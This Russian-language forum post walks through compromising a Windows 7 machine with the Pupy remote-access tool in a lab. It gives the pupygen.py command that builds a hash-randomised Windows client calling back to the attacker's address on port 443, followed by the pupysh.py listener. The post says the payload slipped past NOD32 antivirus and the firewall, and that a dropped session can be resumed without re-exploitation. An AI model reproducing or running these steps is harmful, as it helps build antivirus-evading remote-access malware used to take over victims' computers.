Показать сообщение отдельно

  #3  
Старый 13.06.2017, 13:51
id2746
Новичок
Регистрация: 13.11.2016
Сообщений: 0
С нами: 4999287

Репутация: 0
По умолчанию

Инструмент периодически обновляется и является актуальным на сегодняшний день.

Пример компрометации для малоопытных пользователей:
В качастве атакующей систем kali linux 2017.1 с адресом 192.168.43.162
В качасве атакуемой системы win7 x64 c АВ NOD32.

Генерируем нагрузку:

Код:


Код:
./pupygen.py -f client -O windows -A x64 -o test_for_codeby.exe --randomize-hash connect --host 192.168.43.162:443


Получаем файл (test_for_codeby.exe) с заданными параметрами:



он находится в папке с pupy:



Доставляем файл на целевую систему, после чего из папку с pupy запускаем клиентскую часть:

Код:


Код:
./pupysh.py


Проверим файл NOD'ом c обновленными от 13.05.2017г. сигнатурами:



Как видим, всё ОК.

После запуска файла на целевой системе получаем сессию:



Список команд:



Наш процесс ID и разыв сессии:



Спасибо ~~DarkNode~~за обзор!!!
[doublepost=1497343964,1497343770][/doublepost]П.С. Мой пост к тому, что благодаря шифрованию и SSL ни брандмауэр ни АВ наш файл не заблокировали.
Минусом лично для меня является размер файла



[doublepost=1497347490][/doublepost]Еще добавлю.
В отличие от meterpreter, при разрыве сессии отсутствует необходимость повторной эксплуатации цели (в случае с pupy это повторный запуск вредоносного файла на целевой машине). Т.е. если процесс не был завершен, то достаточно повторно запустить листенер.
 
Ответить с цитированием